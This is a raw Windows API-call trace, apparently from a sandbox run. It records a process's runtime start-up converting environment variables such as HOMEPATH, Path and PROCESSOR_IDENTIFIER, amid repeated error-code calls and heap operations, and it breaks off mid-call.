[0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) [0049.244] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.245] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6614a8) returned 0x24 [0049.245] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6614a8, Size=0x28) returned 0x6614a8 [0049.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0049.245] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x25) returned 0x65a760 [0049.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x65a760, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0049.245] GetLastError () returned 0x0 [0049.245] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.246] SetLastError (dwErrCode=0x0) [0049.246] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] GetLastError () returned 0x0 [0049.247] SetLastError (dwErrCode=0x0) [0049.247] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6614a8) returned 0x28 [0049.247] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6614a8, Size=0x2c) returned 0x6614a8 [0049.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0049.247] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x39) returned 0x6554d0 [0049.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6554d0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.248] GetLastError () returned 0x0 [0049.248] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] GetLastError () returned 0x0 [0049.249] SetLastError (dwErrCode=0x0) [0049.249] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6614a8) returned 0x2c [0049.249] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6614a8, Size=0x30) returned 0x6614a8 [0049.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0049.250] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x18) returned 0x6614e0 [0049.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6614e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.250] SetLastError (dwErrCode=0x0) [0049.250] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.251] GetLastError () returned 0x0 [0049.251] SetLastError (dwErrCode=0x0) [0049.252] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6614a8) returned 0x30 [0049.252] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6614a8, Size=0x34) returned 0x661500 [0049.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0049.252] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x17) returned 0x6614a8 [0049.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6614a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.252] SetLastError (dwErrCode=0x0) [0049.252] GetLastError () returned 0x0 [0049.253] SetLastError (dwErrCode=0x0) [0049.253] GetLastError () returned 0x0 [0049.253] SetLastError (dwErrCode=0x0) [0049.253] GetLastError () returned 0x0 [0049.253] SetLastError (dwErrCode=0x0) [0049.253] GetLastError () returned 0x0 [0049.253] SetLastError (dwErrCode=0x0) [0049.253] GetLastError () returned 0x0 [0049.253] SetLastError (dwErrCode=0x0) [0049.253] GetLastError () returned 0x0 [0049.253] SetLastError (dwErrCode=0x0) [0049.254] GetLastError () returned 0x0 [0049.254] SetLastError (dwErrCode=0x0) [0049.254] GetLastError () returned 0x0 [0049.254] SetLastError (dwErrCode=0x0) [0049.254] GetLastError () returned 0x0 [0049.254] SetLastError (dwErrCode=0x0) [0049.254] GetLastError () returned 0x0 [0049.254] SetLastError (dwErrCode=0x0) [0049.254] GetLastError () returned 0x0 [0049.254] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] GetLastError () returned 0x0 [0049.255] SetLastError (dwErrCode=0x0) [0049.255] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661500) returned 0x34 [0049.255] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661500, Size=0x38) returned 0x661500 [0049.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0049.255] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xe) returned 0x65e458 [0049.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x65e458, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.256] SetLastError (dwErrCode=0x0) [0049.256] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.257] GetLastError () returned 0x0 [0049.257] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] GetLastError () returned 0x0 [0049.258] SetLastError (dwErrCode=0x0) [0049.258] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661500) returned 0x38 [0049.258] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661500, Size=0x3c) returned 0x661500 [0049.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0049.259] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x69) returned 0x661548 [0049.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x661548, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.259] SetLastError (dwErrCode=0x0) [0049.259] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.260] SetLastError (dwErrCode=0x0) [0049.260] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.261] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661500) returned 0x3c [0049.261] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661500, Size=0x40) returned 0x661500 [0049.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0049.261] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3e) returned 0x655518 [0049.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x655518, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0049.261] GetLastError () returned 0x0 [0049.261] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.262] SetLastError (dwErrCode=0x0) [0049.262] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] SetLastError (dwErrCode=0x0) [0049.263] GetLastError () returned 0x0 [0049.263] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661500) returned 0x40 [0049.263] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661500, Size=0x44) returned 0x6615c0 [0049.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0049.263] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1b) returned 0x65ec50 [0049.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x65ec50, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0049.263] GetLastError () returned 0x0 [0049.264] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x44 [0049.264] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x48) returned 0x6615c0 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0049.264] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1d) returned 0x65ec78 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x65ec78, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0049.264] GetLastError () returned 0x0 [0049.264] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x48 [0049.264] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x4c) returned 0x6615c0 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0049.264] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x48) returned 0x656908 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x656908, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0049.264] GetLastError () returned 0x0 [0049.264] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x4c [0049.264] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x50) returned 0x6615c0 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0049.264] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x12) returned 0x661500 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x661500, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0049.264] GetLastError () returned 0x0 [0049.264] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x50 [0049.264] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x54) returned 0x6615c0 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0049.264] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x18) returned 0x661520 [0049.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x661520, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0049.264] GetLastError () returned 0x0 [0049.265] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x54 [0049.265] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x58) returned 0x6615c0 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0049.265] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1b) returned 0x65eca0 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x65eca0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0049.265] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x58 [0049.265] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x5c) returned 0x6615c0 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 